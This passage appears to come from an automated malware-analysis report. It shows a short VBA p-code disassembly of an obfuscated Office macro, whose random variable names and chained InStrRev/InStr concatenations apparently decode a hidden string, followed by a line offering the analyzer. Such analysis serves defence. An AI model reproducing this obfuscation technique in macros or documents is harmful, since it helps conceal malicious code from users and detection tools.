BWqOQfTr ' Add ' Ld VktFjSKfkhMEvwNTj ' Add ' ArgsLd InStrRev 0x0002 ' Mul ' LitDI2 0x0001 ' ArgsSt ALcwUkj 0x0001 ' Line #30: ' Ld pThBbh ' Ld Fwclq ' Add ' Ld PswSGCSoSmEUXfIBu ' Add ' Ld iqhBdi ' Ld SNnWhUX ' Add ' Ld SRBsjdoTzazcprKFlFZuj ' Add ' ArgsLd InStrRev 0x0002 ' Ld ZRzBlzRF ' Ld ZfzBENJ ' Add ' Ld mpXKYKScwtWSnMqSNaf ' Add ' Ld wYMKE ' Ld PPaRJBGY ' Add ' Ld hpHpGHrlrWqRhQMAdzO ' Add ' ArgsLd InStrRev 0x0002 ' Add ' LitDI2 0x0002 ' ArgsSt ALcwUkj 0x0001 ' Line #31: ' Ld dHrWZ ' Ld RHmtp ' Add ' Ld rRUvTpZzsKrlhbTuAM ' Add ' Ld VqWlEi ' Ld RCwUiIEv ' Add ' Ld DKwLidMZKZvPFtBwEQqS ' Add ' FnInStr ' Ld omZpYWYo ' Ld oRJHt ' Add ' Ld JUOVmbhJzwBVNStqmDBnB ' Add ' Ld zEkpzDfE ' Ld pXBtwIPX ' Add ' Ld uvwWrNCIIjNOnvTCuWRfuF ' Add ' ArgsLd InStrRev 0x0002 ' Ld zovlQbVF ' Ld NwjBs ' Add ' Ld QbJOzbwUfPcQvVEz ' Add ' Ld PmthtP ' Ld StdVGd ' Add ' Ld dANkpwwcmFwDvjCBpQhE ' Add ' FnInStr ' Mul ' Add ' Ld bBmmHJY ' Ld sEkch ' Add ' Ld nEGJmRFwmDcoWvvNuKTV ' Add ' Ld KuVsKGV ' Ld cdzCoKwp ' Add ' Ld FvzmwISUZfUjcWjDYfiv ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' LitDI2 0x0003 ' ArgsSt ALcwUkj 0x0001 ' Line #32: ' EndSub ' Line #33: |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.